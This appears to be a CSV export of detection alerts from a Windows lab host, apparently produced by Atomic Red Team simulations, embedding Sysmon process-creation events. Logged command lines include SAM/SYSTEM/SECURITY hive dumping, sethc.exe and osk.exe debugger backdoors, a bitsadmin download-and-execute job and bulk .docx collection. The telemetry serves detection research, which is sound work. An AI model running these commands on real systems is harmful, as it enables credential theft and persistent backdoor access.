SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3665 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:31.115 + 747F3D96-D83F-5D31-0000-001001EC2E00 + 3760 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3663 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.995 + 747F3D96-D83E-5D31-0000-001046E52E00 + 4332 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3661 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.882 + 747F3D96-D83E-5D31-0000-001088DE2E00 + 7072 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3659 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:48:30.775 + 747F3D96-D83E-5D31-0000-0010A2D72E00 + 4036 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3733 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:07.254 + 747F3D96-D89F-5D31-0000-00106C7D3200 + 864 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3732 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:02.238 + 747F3D96-D89A-5D31-0000-0010F2703200 + 1132 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3729 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:50:02.144 + 747F3D96-D89A-5D31-0000-0010A46B3200 + 1228 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3728 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.263 + 747F3D96-D890-5D31-0000-001085443200 + 4316 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3727 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.202 + 747F3D96-D890-5D31-0000-0010FA3F3200 + 1568 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3725 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:52.011 + 747F3D96-D890-5D31-0000-001012383200 + 608 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D88F-5D31-0000-0010BD353200 + 2780 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3724 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:51.971 + 747F3D96-D88F-5D31-0000-0010BD353200 + 2780 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3723 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:43.520 + 747F3D96-D887-5D31-0000-0010D51F3200 + 752 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3721 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:41.646 + 747F3D96-D885-5D31-0000-00107F1A3200 + 2832 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547779.255338,2019-07-19T18:49:39.255338+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3719 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:39.214 + 747F3D96-D883-5D31-0000-0010839B3100 + 3904 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\System system.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.63255,2019-07-19T18:49:33.632550+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3717 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.603 + 747F3D96-D87D-5D31-0000-0010958F3100 + 1728 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg save HKLM\Security security.hive" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.572021,2019-07-19T18:49:33.572021+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3715 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.541 + 747F3D96-D87D-5D31-0000-0010FA8A3100 + 3868 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.392501,2019-07-19T18:49:33.392501+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3713 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.365 + 747F3D96-D87D-5D31-0000-0010CA843100 + 3900 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.331942,2019-07-19T18:49:33.331942+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3711 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.284 + 747F3D96-D87D-5D31-0000-00103B803100 + 324 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.251689,2019-07-19T18:49:33.251689+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3709 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.209 + 747F3D96-D87D-5D31-0000-0010B37B3100 + 3616 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.175813,2019-07-19T18:49:33.175813+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3707 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.113 + 747F3D96-D87D-5D31-0000-00102B773100 + 2148 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\cmd.exe" /c "reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run" + C:\AtomicRedTeam\ + MSEDGEWIN10\IEUser + 747F3D96-D4B4-5D31-0000-002051090500 + 0x50951 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-D6F7-5D31-0000-00104ACE2500 + 3912 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + powershell + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1563547773.059631,2019-07-19T18:49:33.059631+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 3705 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-19 14:49:33.019 + 747F3D96-D87D-5D31-0000-001090723100 + 196 + 